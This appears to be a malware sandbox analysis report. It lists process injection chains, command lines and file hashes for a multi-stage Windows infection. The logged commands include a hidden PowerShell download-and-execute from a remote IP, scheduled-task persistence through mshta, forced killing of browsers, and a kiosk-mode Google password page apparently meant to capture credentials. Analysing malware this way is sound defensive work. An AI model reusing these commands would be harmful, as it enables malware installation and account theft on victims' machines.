N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4284 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
PID 3668 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
PID 4700 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
PID 4284 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
PID 4960 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
PID 4284 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe
PID 4284 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
PID 4116 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\cmd.exe
PID 4116 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\mshta.exe
PID 2200 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4916 wrote to memory of 4936 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 5084 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2640 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3896 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 2640 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2640 wrote to memory of 4448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe

C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe

"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"

C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe

"C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe"

C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe

"C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DYGSWKX2LYZUHEALVPVSVELUY8PS3KUJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "j0vHkma9RZa" /tr "mshta \"C:\Temp\7Ate2U9Z1.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\7Ate2U9Z1.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"

C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"

C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1996 -ip 1996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 800

C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe

"C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe"

C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe

"C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe"

C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe

"C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe

"C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe

"C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe

"C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe"

C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe

"C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe"

C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe

"C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c4156f6-e391-4bc0-b594-466f9199cb58} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2400 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d80d95b0-4188-4705-a6b6-d07318703a7e} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3040 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42760d12-e141-42ce-b531-b4a97c9ea3b1} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4116 -prefMapHandle 4112 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac157a1-f8fb-4adc-b3bb-7ed18f7fd852} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4744 -prefMapHandle 4740 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {563cdd56-265b-4054-a3ce-c3d948f9d5f7} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5012 -prefMapHandle 5360 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d4ea74e-7da4-4994-9ef7-ef8eb95057de} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 4 -isForBrowser -prefsHandle 5520 -prefMapHandle 5528 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a30cbc54-bc37-4aed-8b06-07888ef366fe} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 5 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fcfe0068-0237-4ee5-bd03-8a36deaf886f} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe

"C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe

MD5 7b45c3677c257113115f23dfcaa26814
SHA1 336d8bbf5ed9e5ccfa84add87c63ec8ac64409a6
SHA256 002a077540ad5c7b2b1d4f324abc7a47fd2eb4e5484401da948bb068c8dcb47f
SHA512 69e28d547fcdd5fe7718b2ec45fd5d0df4521afea6d5f483418a73fbf16804b4df81e4cc354bc8caec956656ee5af234300e1cbaa60d43a8f00752c1032531cd

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe

MD5 d7ff6e16dfc21e0b3e596aba511b910f
SHA1 c9dd4ae8db521cc755ac8f368db87c2dca5abccd
SHA256 23f00951ff701f27faa9b1ec58ce3f99454df1cbad1f176337fed33b7e4b8da1
SHA512 fbd9a46512d8fcb1037abc03520c6f968ca40ee9029795207c02bdf328559d93f23229d26affa6f8dc8e7bf09c24d250a1914dc1e0e78fe7b0f94cc1f43905d7

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe

MD5 e1a8a7c307300e5da588114053275120
SHA1 8b84333c2d2f3d0572278d34ccf03782790dd641
SHA256 916bf39546059ebb4f6d5f03bf93ac9684e85c91966696bfd6c9f21e39b3341f
SHA512 99a03a420be15db81da20109826532000988fa5450c956ecf9ae5be2914c1f1d9d487ef2f55655f0029b6316217cebfdd1bdeb7c7d253afe42284e7f5cc3ac77

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\vcruntime140.dll

MD5 7af17bfd24be72d5376c9c5ce86bef54
SHA1 23bf5fa4c467f28990cc878ef945f9f5db616b75
SHA256 bf28f4d89ea74cb5cecbf42b951bf0629d71efa6525cc58aee71aa5e06f1198a
SHA512 0783c5dae87f110cc9bb61355c92c4ef3a96f484bbce6354d7f4130bb92ffb655974fcac4fe11c8923dd81ddade7fa92c8e3d9c43d0a3d0a24dd3d30e626fb5e

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\libcrypto-3-x64.dll

MD5 8d9dc42ffefe2b3443add056784c98fb
SHA1 c2a97d2a372e4badacac196a1f6bcbecdcd35940
SHA256 d45ff6fdb2911d07efc3d47a2e0298534eab617d63e9eebd358d1686ed0992aa
SHA512 e04e07e7c7a8f9b9b98ca0e94767a64808295290a936b50786e06f6a65207dd6ee4fd423bc3e1639186005767e0522c3dd7ba23ac0cbe50116249717fd6c3b83

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\msvcp140.dll

MD5 d424100821374848f3c22d0acd55ad69
SHA1 8e4f879faece2d5171b3d398202c74b7286c50b1
SHA256 a6e45d08e347eddc955e5074354fc9e98a48ee75587b73a18d01943527cf05a8
SHA512 f78085cbba49c4c2c4441d1483e63e9222ec5b4282b89c1e0c1ea0790972e5de452f82e61ceae7324c7466d33b9a5fc6224594cf574068c69bf949e94fb86ae6

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\vcruntime140_1.dll

MD5 e2520906be67a9bde01ebe9e0a53aab5
SHA1 9a9e445a47508ba5e1126791a863107060d258a1
SHA256 fd8ee0936d0380962830e9c1a132b8b7bf25084cb342bb064f699a2daa343bc4
SHA512 6616df46da37f656ac3e1fe7b371792b249e3ff97f2cbcefc19e7854e384aba88f63e7afc7c81ba14d3d15d309146986b23e25c071f4d0150429009de110e9c5

C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe

MD5 c538a47d1a799fa7d1788d983103e4bd
SHA1 050bb4d8fc9d0205e9c87a48e177d0415305225d
